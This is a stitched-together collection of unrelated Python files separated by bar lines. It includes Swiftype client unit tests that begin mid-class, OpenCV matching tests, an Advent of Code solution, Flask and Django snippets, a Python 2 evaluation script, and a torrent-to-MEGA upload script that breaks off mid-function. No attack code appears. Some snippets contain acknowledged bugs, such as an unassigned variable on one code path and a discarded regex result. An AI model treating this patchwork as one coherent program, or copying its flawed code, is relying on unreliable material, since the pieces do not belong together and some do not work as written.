            api_key = "a-test-api-key"
        self.client = swiftype.Client(api_key=api_key, host='localhost:3000')
        self.engine = 'api-test'
        self.document_type = 'books'
    def test_engines(self):
        with vcr.use_cassette('fixtures/engines.yaml'):
            self.__is_expected_collection(self.client.engines, 200, 3, {'slug': 'api-test'})
    def test_engine(self):
        with vcr.use_cassette('fixtures/engine.yaml'):
            slug = self.client.engine(self.engine)['body']['slug']
            self.assertEqual(slug, self.engine)
    def test_engine_create(self):
        with vcr.use_cassette('fixtures/engine_create.yaml'):
            engine = 'myengine'
            slug = self.client.create_engine(engine)['body']['slug']
            self.assertEqual(slug, engine)
    def test_engine_destroy(self):
        with vcr.use_cassette('fixtures/engine_destroy.yaml'):
            engine = 'myengine'
            response = self.client.destroy_engine(engine)
            self.assertEqual(response['status'], 204)
    def test_document_types(self):
        with vcr.use_cassette('fixtures/document_types.yaml'):
            self.__is_expected_collection(self.client.document_types, 200, 2, {'slug': 'books'}, self.engine)
    def test_document_type(self):
        with vcr.use_cassette('fixtures/document_type.yaml'):
            self.__is_expected_result(self.client.document_type, 200, {'slug': self.document_type}, self.engine, self.document_type)
    def test_create_document_type(self):
        with vcr.use_cassette('fixtures/create_document_type.yaml'):
            document_type = 'videos'
            slug = self.client.create_document_type(self.engine, document_type)['body']['slug']
            self.assertEqual(slug, document_type)
    def test_destroy_document_type(self):
        with vcr.use_cassette('fixtures/destroy_document_type.yaml'):
            document_type = 'videos'
            response = self.client.destroy_document_type(self.engine, document_type)
            self.assertEqual(response['status'], 204)
    def test_documents(self):
        with vcr.use_cassette('fixtures/documents.yaml'):
            self.__is_expected_collection(self.client.documents, 200, 2, {'external_id': '1'}, self.engine, self.document_type)
    def test_documents_pagination(self):
        with vcr.use_cassette('fixtures/documents_pagination.yaml'):
            self.__is_expected_collection(self.client.documents, 200, 2, {'external_id': '1'}, self.engine, self.document_type, 2, 10)
    def test_document(self):
        with vcr.use_cassette('fixtures/document.yaml'):
            external_id = '1'
            id = self.client.document(self.engine, self.document_type, external_id)['body']['external_id']
            self.assertEqual(id, external_id)
    def test_create_document(self):
        with vcr.use_cassette('fixtures/create_document.yaml'):
            doc_id = 'doc_id'
            id = self.client.create_document(self.engine, self.document_type, {'external_id': doc_id})['body']['external_id']
            self.assertEqual(id, doc_id)
    def test_create_documents(self):
        with vcr.use_cassette('fixtures/create_documents.yaml'):
            docs = [{'external_id': 'doc_id1'}, {'external_id': 'doc_id2'}]
            stati = self.client.create_documents(self.engine, self.document_type, docs)['body']
            self.assertEqual(stati, [True, True])
    def test_create_or_update_document(self):
        with vcr.use_cassette('fixtures/create_or_update_document.yaml'):
            id = '1'
            external_id = self.client.create_or_update_document(self.engine, self.document_type, {'external_id': id, 'fields': {}})['body']['external_id']
            self.assertEqual(external_id, id)
    def test_create_or_update_documents(self):
        with vcr.use_cassette('fixtures/create_or_update_documents.yaml'):
            docs = [{'external_id': '1'}, {'external_id': '2'}]
            stati = self.client.create_or_update_documents(self.engine, self.document_type, docs)['body']
            self.assertEqual(stati, [True, True])
    def test_create_or_update_documents_failure(self):
        with vcr.use_cassette('fixtures/create_or_update_documents_failure.yaml'):
            docs = [{'external_id': '1', 'fields': [{'type': 'string', 'name': 'title'}]}] # <= missing 'value'
            stati = self.client.create_or_update_documents(self.engine, self.document_type, docs)['body']
            self.assertEqual(stati, [False])
    def test_create_or_update_documents_verbose(self):
        with vcr.use_cassette('fixtures/create_or_update_documents_verbose.yaml'):
            docs = [{'external_id': '1'}, {'external_id': '2'}]
            stati = self.client.create_or_update_documents_verbose(self.engine, self.document_type, docs)['body']
            self.assertEqual(stati, [True, True])
    def test_create_or_update_documents_verbose_failure(self):
        with vcr.use_cassette('fixtures/create_or_update_documents_verbose_failure.yaml'):
            docs = [{'external_id': '1', 'fields': [{'type': 'string', 'name': 'title'}]}] # <= missing 'value'
            stati = self.client.create_or_update_documents_verbose(self.engine, self.document_type, docs)['body']
            self.assertRegexpMatches(stati[0], r'^Invalid field definition')
    def test_update_document(self):
        with vcr.use_cassette('fixtures/update_document.yaml'):
            document_id = '2'
            id = self.client.update_document(self.engine, self.document_type, document_id, {'title': 'a new title'})['body']['external_id']
            self.assertEqual(id, document_id)
    def test_update_documents(self):
        with vcr.use_cassette('fixtures/update_documents.yaml'):
            documents = [ {'external_id': '1', 'fields': { 'myfieldthathasnotbeencreated': 'foobar' }},
                          {'external_id': '2', 'fields': { 'title': 'new title' }} ]
            stati = self.client.update_documents(self.engine, self.document_type, documents)['body']
            self.assertEqual(stati, [False, True])
    def test_destroy_document(self):
        with vcr.use_cassette('fixtures/destroy_document.yaml'):
            response = self.client.destroy_document(self.engine, self.document_type, 'doc_id')
            self.assertEqual(response['status'], 204)
    def test_destroy_documents(self):
        with vcr.use_cassette('fixtures/destroy_documents.yaml'):
            documents = ['doc_id1', 'doc_id2']
            stati = self.client.destroy_documents(self.engine, self.document_type, documents)['body']
            self.assertEqual(stati, [True, True])
    def test_search(self):
        with vcr.use_cassette('fixtures/search.yaml'):
            total_count = len(self.client.document_types(self.engine)['body'])
            self.assertTrue(total_count > 1)
            self.__is_expected_search_result(self.client.search, total_count)
    def test_search_with_options(self):
        with vcr.use_cassette('fixtures/search_with_options.yaml'):
            total_count = len(self.client.document_types(self.engine)['body'])
            self.assertTrue(total_count > 1)
            response = self.client.search(self.engine, 'query', {'page': 2})
            self.assertEqual(len(response['body']['records']), total_count)
    def test_search_document_type(self):
        with vcr.use_cassette('fixtures/search_document_type.yaml'):
            self.__is_expected_search_result(self.client.search_document_type, 1, [self.document_type])
    def test_search_document_type_with_options(self):
        with vcr.use_cassette('fixtures/search_document_type_with_options.yaml'):
            response = self.client.search_document_type(self.engine, self.document_type, "query", {'page': 2})
            self.assertEqual(len(response['body']['records']), 1)
    def test_suggest(self):
        with vcr.use_cassette('fixtures/suggest.yaml'):
            total_count = len(self.client.document_types(self.engine)['body'])
            self.assertTrue(total_count > 1)
            self.__is_expected_search_result(self.client.suggest, total_count)
    def test_suggest_with_options(self):
        with vcr.use_cassette('fixtures/suggest_with_options.yaml'):
            total_count = len(self.client.document_types(self.engine)['body'])
            self.assertTrue(total_count > 1)
            response = self.client.suggest(self.engine, 'query', {'page': 2})
            self.assertEqual(len(response['body']['records']), total_count)
    def test_suggest_document_type(self):
        with vcr.use_cassette('fixtures/suggest_document_type.yaml'):
            self.__is_expected_search_result(self.client.suggest_document_type, 1, [self.document_type])
    def test_suggest_document_type_with_options(self):
        with vcr.use_cassette('fixtures/suggest_document_type_with_options.yaml'):
            response = self.client.suggest_document_type(self.engine, self.document_type, "query", {'page': 2})
            self.assertEqual(len(response['body']['records']), 1)
    def test_analytics_searches(self):
        with vcr.use_cassette('fixtures/analytics_searches.yaml'):
            searches = self.client.analytics_searches(self.engine)['body']
            self.assertTrue(len(searches) == 15)
    def test_analytics_searches_pagination(self):
        with vcr.use_cassette('fixtures/analytics_searches_pagination.yaml'):
            searches = self.client.analytics_searches(self.engine, '2013-12-31', '2014-01-01')['body']
            self.assertTrue(len(searches) == 2)
    def test_analytics_autoselects(self):
        with vcr.use_cassette('fixtures/analytics_autoselects.yaml'):
            autoselects = self.client.analytics_autoselects(self.engine)['body']
            self.assertTrue(len(autoselects) == 15)
    def test_analytics_autoselects_pagination(self):
        with vcr.use_cassette('fixtures/analytics_autoselects_pagination.yaml'):
            autoselects = self.client.analytics_autoselects(self.engine, '2013-12-31', '2014-01-01')['body']
            self.assertTrue(len(autoselects) == 2)
    def test_analytics_top_queries(self):
        with vcr.use_cassette('fixtures/analytics_top_queries.yaml'):
            top_queries = self.client.analytics_top_queries(self.engine)['body']
            self.assertTrue(len(top_queries) == 2)
    def test_analytics_top_queries_pagination(self):
        with vcr.use_cassette('fixtures/analytics_top_queries_pagination.yaml'):
            top_queries = self.client.analytics_top_queries(self.engine, 2, 10)['body']
            self.assertTrue(len(top_queries) == 2)
    def test_analytics_top_queries_in_range(self):
        with vcr.use_cassette('fixtures/analytics_top_queries_in_range.yaml'):
            top_queries = self.client.analytics_top_queries_in_range(self.engine, '2013-12-31', '2014-01-01')['body']
            self.assertTrue(len(top_queries) == 2)
    def test_analytics_top_no_result_queries(self):
        with vcr.use_cassette('fixtures/analytics_top_no_result_queries.yaml'):
            autoselects = self.client.analytics_top_no_result_queries(self.engine)['body']
            self.assertTrue(len(autoselects) == 2)
    def test_analytics_top_no_result_queries_with_dates(self):
        with vcr.use_cassette('fixtures/analytics_top_no_result_queries_with_dates.yaml'):
            autoselects = self.client.analytics_top_no_result_queries(self.engine, '2013-12-31', '2014-01-01')['body']
            self.assertTrue(len(autoselects) == 2)
    def test_domains(self):
        with vcr.use_cassette('fixtures/domains.yaml'):
            domains = self.client.domains('crawler-demo')['body']
            self.assertTrue(len(domains) == 2)
    def test_domain(self):
        with vcr.use_cassette('fixtures/domain.yaml'):
            domain_id = '52c759423ae7403ec900003b'
            domain = self.client.domain('crawler-demo', domain_id)['body']
            self.assertEqual(domain['id'], domain_id)
    def test_create_domain(self):
        with vcr.use_cassette('fixtures/create_domain.yaml'):
            url = 'http://www.example.com'
            domain_url = self.client.create_domain('crawler-demo', url)['body']['submitted_url']
            self.assertEqual(domain_url, url)
    def test_destroy_domain(self):
        with vcr.use_cassette('fixtures/destroy_domain.yaml'):
            status = self.client.destroy_domain('crawler-demo', '52c759423ae7403ec900003b')['status']
            self.assertEqual(status, 204)
    def test_recrawl_domain(self):
        with vcr.use_cassette('fixtures/recrawl_domain.yaml'):
            domain_id = '52c754fb3ae7406fd3000001'
            domain = self.client.recrawl_domain('crawler-demo', domain_id)['body']
            self.assertEqual(domain['id'], domain_id)
    def test_crawl_url(self):
        with vcr.use_cassette('fixtures/crawl_domain.yaml'):
            domain_id = '52c754fb3ae7406fd3000001'
            url = 'http://crawler-demo-site.herokuapp.com/2012/01/01/first-post.html'
            crawled_url = self.client.crawl_url('crawler-demo', domain_id, url)['body']['url']
            self.assertEqual(crawled_url, url)
    # --- shared assertion helpers -------------------------------------
    def __is_expected_search_result(self, request, document_type_count, args=[]):
        # Issue a '*' query and check the record count per document type.
        response = request(self.engine, *(args + ['*']))
        self.assertEqual(len(response['body']['records']), document_type_count)
    def __is_expected_result(self, request, status_code, expected_values, *args):
        # Single-object response: status plus expected key/value pairs.
        response = request(*args)
        self.assertEqual(response['status'], status_code)
        for k,v in expected_values.items():
            self.assertEqual(response['body'][k], v)
    def __is_expected_collection(self, request, status_code, collection_length, expected_values, *args):
        # Collection response: status, length, and exactly one item matching
        # each expected key/value pair.
        response = request(*args)
        self.assertEqual(response['status'], status_code)
        self.assertEqual(len(response['body']), collection_length)
        for k,v in expected_values.items():
            self.assertEqual(len([item for item in response['body'] if item[k] == v]), 1)
    def __time_name(self):
        # Seconds-since-epoch string, usable as a unique-ish fixture name.
        return str(int(time.mktime(time.gmtime())))
    def __create_temporary_engine(self, name = None):
        # NOTE(review): dead stub -- computes a name then returns None and is
        # never called in this file; kept for interface compatibility.
        name = name if name else self.__time_name()
        return
class TestClientUsernameAndPassword(unittest.TestCase):
    """Verifies the client also works with username/password authentication."""
    def setUp(self):
        self.client = swiftype.Client(
            username='some_user',
            password='some_pasword',
            host='localhost:3000'
        )
    def test_engine_create(self):
        # Replays the same cassette as the API-key variant of this test.
        with vcr.use_cassette('fixtures/engine_create.yaml'):
            engine = 'myengine'
            slug = self.client.create_engine(engine)['body']['slug']
            self.assertEqual(slug, engine)
class TestPlatformUsers(unittest.TestCase):
    """Platform user management and SSO token/URL generation tests."""
    def setUp(self):
        # Fall back to a dummy key when API_KEY is unset.  Catch only
        # KeyError: the original bare `except:` hid unrelated failures.
        try:
            api_key = os.environ['API_KEY']
        except KeyError:
            api_key = "a-test-api-key"
        # Fixed test credentials matching the recorded cassettes.
        client_id = '3e4fd842fc99aecb4dc50e5b88a186c1e206ddd516cdd336da3622c4afd7e2e9'
        client_secret = '4441879b5e2a9c3271f5b1a4bc223b715f091e5ed20fe75d1352e1290c7a6dfb'
        self.client = swiftype.Client(api_key=api_key, client_id=client_id, client_secret=client_secret, host='localhost:3000')
    def test_users(self):
        with vcr.use_cassette('fixtures/users.yaml'):
            response = self.client.users()
            self.assertEqual(response['status'], 200)
            self.assertEqual(len(response['body']), 2)
    def test_users_pagination(self):
        with vcr.use_cassette('fixtures/users_pagination.yaml'):
            response = self.client.users(page=2)
            self.assertEqual(response['status'], 200)
            self.assertEqual(len(response['body']), 0)
    def test_user(self):
        with vcr.use_cassette('fixtures/user.yaml'):
            user_id = '12345'
            response = self.client.user(user_id)
            self.assertEqual(response['body']['id'], user_id)
    def test_create_user(self):
        with vcr.use_cassette('fixtures/create_user.yaml'):
            response = self.client.create_user()
            self.assertEqual(response['status'], 200)
    def test_sso_token(self):
        # Deterministic: token derives from user_id + fixed timestamp.
        timestamp = 1379382520
        user_id = '5064a7de2ed960e715000276'
        token = self.client._sso_token(user_id, timestamp)
        self.assertEqual(token, '81033d182ad51f231cc9cda9fb24f2298a411437')
    def test_sso_url(self):
        # Pin the timestamp so the generated URL is reproducible.
        self.client._get_timestamp = Mock(return_value=1379382520)
        user_id = '5064a7de2ed960e715000276'
        url = self.client.sso_url(user_id)
        self.assertEqual(
            parse_qs(urlparse(url).query),
            {
                'user_id': ['5064a7de2ed960e715000276'],
                'client_id': ['3e4fd842fc99aecb4dc50e5b88a186c1e206ddd516cdd336da3622c4afd7e2e9'],
                'token': ['81033d182ad51f231cc9cda9fb24f2298a411437'],
                'timestamp': ['1379382520'],
            },
        )
class TestPlatformResources(unittest.TestCase):
    """Tests resource creation using an OAuth access token instead of an API key."""
    def setUp(self):
        # Fixed token matching the recorded platform_* cassettes.
        access_token = '6cf7fbd297f00a8e3863a0595f55ff7d141cbef2fcbe00159d0f7403649b384e'
        self.engine = 'myusersengine'
        self.document_type = 'videos'
        self.client = swiftype.Client(access_token=access_token, host='localhost:3000')
    def test_platform_engine_create(self):
        with vcr.use_cassette('fixtures/platform_engine_create.yaml'):
            response = self.client.create_engine(self.engine)
            self.assertEqual(response['body']['name'], self.engine)
    def test_platform_create_document_type(self):
        with vcr.use_cassette('fixtures/platform_create_document_type.yaml'):
            response = self.client.create_document_type(self.engine, self.document_type)
            self.assertEqual(response['body']['slug'], self.document_type)
    def test_platform_create_document(self):
        with vcr.use_cassette('fixtures/platform_create_document.yaml'):
            doc_id = 'doc_id'
            id = self.client.create_document(self.engine, self.document_type, {'external_id': doc_id})['body']['external_id']
            self.assertEqual(id, doc_id)
    def test_platform_create_documents(self):
        with vcr.use_cassette('fixtures/platform_create_documents.yaml'):
            docs = [{'external_id': 'doc_id1'}, {'external_id': 'doc_id2'}]
            stati = self.client.create_documents(self.engine, self.document_type, docs)['body']
            self.assertEqual(stati, [True, True])
# Run the whole suite when this file is executed directly.
if __name__ == '__main__':
    unittest.main()
|
"""
MIT License
Copyright (c) 2017 Maxim Krivich
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
"""
|
def factR(n):
    '''
    Return n! computed recursively.

    n is an int >= 0 (0! == 1).
    '''
    # Base case covers both 0 and 1: the original bottomed out only at
    # n == 1, so factR(0) recursed forever (RecursionError).
    if n <= 1:
        return 1
    else:
        return n * factR(n - 1)
|
import cv2_product_test.find
import unittest
import os
import cv2
import numpy as np
# Test fixtures live next to this file.
DATA_DIR = os.path.dirname(os.path.abspath(__file__))
# Scene image and the sub-image (template) to locate within it.
IMG1 = cv2.imread(os.path.join(DATA_DIR, 'icons.png'))
TGT1 = cv2.imread(os.path.join(DATA_DIR, 'icons_region.png'))
# Expected match quadrilateral as four [x, y] corners.
EXP1 = [[172, 62], [270, 62], [270, 163], [172, 163]]
IMG2 = cv2.imread(os.path.join(DATA_DIR, 'android.png'))
TGT2A = cv2.imread(os.path.join(DATA_DIR, 'android_camcorder.png'))
EXP2B = [[1170, 632], [1305, 632], [1305, 788], [1170, 788]]
TGT2B = cv2.imread(os.path.join(DATA_DIR, 'android_firefox.png'))
class TestFeatures(unittest.TestCase):
    """Exercises cv2_product_test.find with several matcher back-ends."""
    def test_sift_flann(self):
        s = cv2_product_test.find.find(TGT1, IMG1, 'sift-flann')
        self.assertIsNotNone(s)
        # Located quad must be within 5 px of the known region corners.
        np.testing.assert_allclose(s.quad, EXP1, atol=5.0)
        vis = s.visualize()
        #cv2.imwrite('tmp.png', vis)
    def test_surf_flann(self):
        s = cv2_product_test.find.find(TGT1, IMG1, 'surf-flann')
        self.assertIsNotNone(s)
        np.testing.assert_allclose(s.quad, EXP1, atol=5.0)
    def test_surf_flann_2(self):
        # NOTE(review): despite the name this passes 'sift-flann', and the
        # quad assertion is commented out -- only checks a match was found.
        s = cv2_product_test.find.find(TGT2B, IMG2, 'sift-flann')
        self.assertIsNotNone(s)
        #np.testing.assert_allclose(s.quad, EXP2B, atol=5.0)
    def test_template(self):
        # Template matching is exact, so no tolerance is needed here.
        s = cv2_product_test.find.find(TGT2B, IMG2, 'template')
        self.assertIsNotNone(s)
        np.testing.assert_allclose(s.quad, EXP2B)
    @unittest.SkipTest
    def test_draw_keypoints(self):
        # Skipped: opens a GUI window and blocks on a key press.
        f = cv2_product_test.find.Features('sift-flann')
        img = f.draw_keypoints(TGT2B)
        cv2.namedWindow('draw_keypoints')
        cv2.imshow('draw_keypoints', img)
        cv2.waitKey(0)
|
"""Advent of Code 2015, Day 10: Elves Look, Elves Say"""
import pytest
puzzle_input = '1113122113'
def parse_number_string(number_string):
    """Apply one look-and-say step: run-length encode the digit string.

    Accepts a string or anything str() can convert (e.g. an int) and
    returns the spoken form, e.g. '1211' -> '111221'.
    """
    run_char, *rest = str(number_string)  # str() so ints work too
    run_len = 1
    chunks = []
    for current in rest:
        if current == run_char:
            run_len += 1
        else:
            chunks.append(str(run_len) + run_char)
            run_char, run_len = current, 1
    chunks.append(str(run_len) + run_char)  # flush the final run
    return ''.join(chunks)
@pytest.mark.parametrize('start,finish', [
    ('1', '11'),
    ('11', '21'),
    ('21', '1211'),
    ('211', '1221'),
    ('1211', '111221'),
    ('111221', '312211'),
])
def test_parse_number_string(start, finish):
    """Known look-and-say expansions, including the puzzle's worked examples."""
    assert parse_number_string(start) == finish
if __name__ == '__main__':
    # Iterate the look-and-say process; print the part-1 answer after 40
    # rounds (before the 41st application) and the part-2 answer after 50.
    for x in range(50):
        if x == 40:
            print(len(puzzle_input))
        puzzle_input = parse_number_string(puzzle_input)
    print(len(puzzle_input))
|
from Util.position import Position
from Util.role import Role
from ai.Algorithm.Graph.Graph import Graph
from ai.STA.Strategy.strategy import Strategy
from ai.STA.Tactic.go_to_random_pose_in_zone import GoToRandomPosition
class PathfinderBenchmark(Strategy):
    """Strategy that stresses the pathfinder: every assigned player wanders
    to random poses inside a fixed 2000x2000 zone centred on the origin."""
    def __init__(self, p_game_state):
        super().__init__(p_game_state)
        # One GoToRandomPosition tactic node per assigned role/player.
        for role, player in self.assigned_roles.items():
            self.create_node(role, GoToRandomPosition(self.game_state, player,
                                                      center_of_zone=Position(-0, 0),
                                                      width_of_zone=2000,
                                                      height_of_zone=2000))
    @classmethod
    def required_roles(cls):
        # No role is mandatory; the benchmark runs with whatever is assigned.
        return []
    @classmethod
    def optional_roles(cls):
        # Accept every role defined in the Role enum.
        return [r for r in Role]
|
import sys
import numpy as np
import pandas as pd
from sklearn.metrics import confusion_matrix, classification_report
# Select which model's output to evaluate from the command line
# (--hunpos -> check == 0, --crf++ -> check == 1).
if len(sys.argv) != 2:
    print("Enter the model option.")
    exit()
if sys.argv[1] == "--hunpos":
    check = 0;
elif sys.argv[1] == "--crf++":
    check = 1
else:
    # Python 2 print statement: this script is Python 2 only.
    print "Enter correct option."
    exit()
dir_path = "./"
# hunpos layout: gold labels in test.txt, predictions in chunking_result.txt.
# NOTE(review): when --crf++ is chosen (check == 1), predicted_labels_file is
# never assigned, so the `else` branch below raises a NameError -- a crf++
# result path was presumably meant to be set here; confirm and fix.
if not check:
    test_data_labels_file = dir_path + "test.txt"
    predicted_labels_file = dir_path + "chunking_result.txt"
# labels: all distinct gold labels; the two lists hold one label per token.
labels = set()
predicted_labels = []
test_data_labels = []
if not check:
    # hunpos: gold file carries the label in column 3; prediction file in column 2.
    with open(test_data_labels_file, "r") as file1, open(predicted_labels_file, "r") as file2:
        for line in (l.rstrip() for l in file1):
            temp = line.split()
            if temp:
                test_data_labels.append(temp[2])
                labels.add(temp[2])
        for line in (l.rstrip() for l in file2):
            if line:
                predicted_labels.append(line.split()[1])
else:
    # crf++: a single file carries gold (column 3) and prediction (column 4).
    with open(predicted_labels_file, "r") as file:
        for line in (l.rstrip() for l in file):
            if line:
                predicted_labels.append(line.split()[3])
                test_data_labels.append(line.split()[2])
                labels.add(line.split()[2])
labels = sorted(list(labels))
predicted_labels = np.array(predicted_labels)
test_data_labels = np.array(test_data_labels)
# Build a labelled confusion matrix on top of sklearn's raw array: each row
# of simple_conf_matrix corresponds to a (sorted) gold label.
simple_conf_matrix = confusion_matrix(test_data_labels,predicted_labels)
conf_matrix = pd.DataFrame(columns = labels, index = labels)
for x,y in zip(simple_conf_matrix,labels):
    conf_matrix[y] = x
conf_matrix = conf_matrix.transpose()
print conf_matrix
print "Classification Report: " + classification_report(test_data_labels, predicted_labels)
|
import flask
# Blueprint grouping the monitoring endpoints under /status; register it
# on the Flask app with app.register_blueprint(status).
status = flask.Blueprint('status', __name__)
@status.route('/status/healthcheck')
def healthcheck() -> str:
    """Liveness probe: an empty 200 response means the process is up."""
    return ''
|
"""context processors
"""
from django.contrib.sites.models import Site
from django.utils.functional import SimpleLazyObject
def site(request):
    """Context processor exposing the current Site's base URL as ``site``.

    The value is wrapped in SimpleLazyObject so the database is only hit
    when a template actually renders ``{{ site }}``.
    """
    return {
        'site': SimpleLazyObject(
            # SiteManager exposes get_current(), not get_current_site()
            # (that name is the shortcut function in
            # django.contrib.sites.shortcuts) -- the original call raised
            # AttributeError at render time.  Passing the request lets
            # Django fall back to host matching when SITE_ID is unset.
            lambda: 'http://%s' % Site.objects.get_current(request).domain
        ),
    }
|
import subprocess
from subprocess import Popen,PIPE
import os
import ConfigParser
import csv
import sys
import shlex
import re
import unicodedata
import time
import shutil
from distutils.dir_util import copy_tree
import zipfile
# Polling period in seconds between checks; overridden from config.txt below.
interval=240
# Install locations of the external tools, read from config.txt; an empty
# string means "on PATH", otherwise a trailing '/' is appended at startup.
delugePath=''
megatoolsPath=''
zip7Path=""
# Script directory; resolved in the main section via getScriptPath().
thisdir=False#os.getcwd()
# Prefix every BitTorrent magnet link starts with.
mstart='magnet:?xt=urn:btih:'
# torrent hash -> [name, finished?] as last reported by deluge-console.
completedStatus={}
uploadedStatus={}
# When True, downloads are 7-zipped before uploading to MEGA.
zipFiles=False
finishedDownloadText='finisheddownloadasdfjhli'
def zipdir(path, ziph):
	"""Recursively add every file below *path* to the open ZipFile *ziph*."""
	for dirpath, _dirnames, filenames in os.walk(path):
		for filename in filenames:
			ziph.write(os.path.join(dirpath, filename))
def getScriptPath():
	"""Absolute directory containing the script being executed (sys.argv[0])."""
	script = os.path.realpath(sys.argv[0])
	return os.path.dirname(script)
def clearTemp():
	"""Delete and recreate <thisdir>/temp, leaving it empty.

	shutil.rmtree raises if the folder does not exist yet; callers rely
	on the main section having created it via ensureFolderExists().
	"""
	folder=thisdir+'/temp'
	shutil.rmtree(folder)
	os.makedirs(folder)
def copyAllToTemp(dir):
	"""Recursively copy *dir* (path relative to the CWD) into <thisdir>/temp.

	The source is prefixed with the Windows long-path marker, so this
	helper is Windows-only as written.  NOTE(review): the source is
	anchored at os.getcwd() while the destination uses thisdir -- confirm
	both are the same directory when this is called.
	"""
	folder=thisdir+'/temp'
	copy_tree("\\\\?\\"+os.getcwd() +dir, folder)
def copyFileToTemp(file):
	"""Copy one file (path relative to the CWD) into <thisdir>/temp.

	Bug fix: shutil.copyfile() requires a full destination *file* path;
	the original passed the temp directory itself, which raises IOError.
	The source's basename is now joined onto the temp folder.  The
	Windows long-path prefix matches copyAllToTemp().
	"""
	folder=thisdir+'/temp'
	shutil.copyfile("\\\\?\\"+os.getcwd() +file, folder+'/'+os.path.basename(file))
def replaceStatusDirectory(parentdir,text):
	"""Replace <parentdir>/status with a single empty file named *text*.

	The file NAME encodes the torrent's progress string, so a remote
	listing of the status folder shows the progress without downloading
	anything.
	"""
	if os.path.exists(parentdir+'/status'):
		# Drop every previous progress marker.
		for file in os.listdir(parentdir+'/status'):
			print file
			os.remove(parentdir+'/status/'+file)
	else:
		os.mkdir(parentdir+'/status')
	file = open(parentdir+'/status'+'/'+text, "w")
	file.write("")
	file.close()
# for dir in os.listdir(thisdir+'/downloads'):
# if dir == hash:
# if os.path.isfile(thisdir+'/downloads/'+hash+'/'+finishedDownloadText):
# os.remove(thisdir+'/downloads/'+hash+'/'+finishedDownloadText)
# for dir in os.listdir(thisdir+'/downloads'):
# if dir in uploadedStatus:
# file = open(thisdir+'/downloads/'+dir+'/'+finishedDownloadText, "w")
# file.write("")
# file.close()
def ensureFolderExists(directory):
	"""Create *directory* (including parents) unless it already exists."""
	if os.path.exists(directory):
		return
	os.makedirs(directory)
def registerDownloadCompleted(hash,username):
	"""Record that *hash* finished uploading for *username*.

	Creates an empty marker file at
	<thisdir>/users/<username>/completedDownloads/<hash>.
	"""
	user_folder = thisdir+'/users/'+username
	ensureFolderExists(user_folder)
	marker_folder = user_folder+'/completedDownloads'
	ensureFolderExists(marker_folder)
	with open(marker_folder+'/'+hash, "w") as marker:
		marker.write("")
def fileAlreadyDownloaded(hash,username):
	"""Return True when *hash* was already marked complete for *username*.

	Bug fixes versus the original:
	* the path now matches what registerDownloadCompleted() writes
	  (users/<username>/completedDownloads -- the '/users/' segment was
	  missing, so markers were never found);
	* the marker folder itself is listed (the original listed
	  folder+'/'+hash, i.e. looked for the hash inside a directory named
	  after the hash).
	"""
	folder=thisdir+'/users/'+username+'/completedDownloads'
	if os.path.exists(folder):
		if hash in os.listdir(folder):
			return True
	return False
def strToValidFilename(value):
	"""Slugify *value* into a safe ASCII filename (Python 2 only: unicode()).

	Steps: decode UTF-8, strip accents via NFKD, drop non-word characters,
	lower-case, then turn spaces into underscores.

	NOTE(review): the result of the second re.sub call below is discarded
	-- it was presumably meant to be assigned back to value (collapsing
	whitespace/hyphen runs to '-'); as written, runs of spaces survive
	until the final replace() turns each space into an underscore.
	"""
	value=unicode(value, "utf-8")
	value = unicodedata.normalize('NFKD', value).encode('ascii', 'ignore')
	value = unicode(re.sub('[^\w\s-]', '', value).strip().lower())
	re.sub('[-\s]+', '-', value)
	value=value.replace(" ","_")
	return value
def createTorrentFromMagnet(magnetstr,hash):
	"""Hand *magnetstr* to deluge-console, downloading into downloads/<hash>.

	Returns True when a fresh download folder was created and the torrent
	was queued; False when the folder already exists (the torrent is
	assumed to be known already).
	"""
	print 'adding magnet grsehrtsh'
	olddir=os.getcwd()
	#os.chdir(delugePath)
	#print 'afklwefg '+str(subprocess.check_output(["deluge-console.exe"]))
	os.chdir(thisdir)
	todl='downloads/'+hash
	if not os.path.exists(todl):
		print 'making dir '+todl
		os.makedirs(todl)
	else:
		# NOTE(review): this early return leaves the process chdir'd to
		# thisdir; olddir is only restored on the success path below.
		print 'folder already exists, not adding torrent'
		return False
	#print 'types: '+str(type(delugePath))+' '+str(type(magnetstr))+' '+str(type(hash))
	#'"'+delugePath+'/deluge-console.exe" add -p downloads/
	#args=shlex.split('"'+delugePath+'/deluge-console.exe" add -p downloads/'+hash+' "'+magnetstr+'"')
	args=shlex.split('"'+delugePath+'deluge-console" add -p "'+thisdir+'/downloads/'+hash+'" '+magnetstr)
	print '\nadding torrent: '+str(args)
	process = Popen(args, stdout=PIPE, stderr=PIPE)
	stdout, stderr = process.communicate()
	#addtorrent=str(subprocess.check_output(args))
	print '\noutput: '+stdout+'\n'+stderr+'^'
	os.chdir(olddir)
	return True
def megaUpdateFiles(username,password,hash):
	"""Sync the download for *hash* to the user's MEGA account.

	Creates /Root/TorrentToCloud/<name>_<hash> remotely, refreshes the
	'status' progress marker while the torrent is still downloading, then
	uploads the payload either as-is (megacopy) or as one 7-zip archive
	(megaput) depending on the zipFiles setting.  All external tools are
	driven via Popen with their output echoed for debugging.
	"""
	olddir=os.getcwd()
	copydir='downloads/'+hash
	if fileAlreadyDownloaded(hash,username):
		print 'already uploaded this file '+str(os.listdir(copydir))
		return
	# Name and finished flag were recorded by updateTorrentStatus().
	name=completedStatus[hash][0]
	finishedTorrenting=completedStatus[hash][1]
	print 'creating mega folder for torrent'
	args=shlex.split('"'+megatoolsPath+'megamkdir" -u '+username+' -p '+password+' /Root/TorrentToCloud/'+strToValidFilename(name)+'_'+hash)
	print 'args2:'+str(args)
	process = Popen(args, stdout=PIPE, stderr=PIPE)
	stdout2, stderr2 = process.communicate()
	print '\noutput: '+stdout2+'\n'+stderr2+'^'
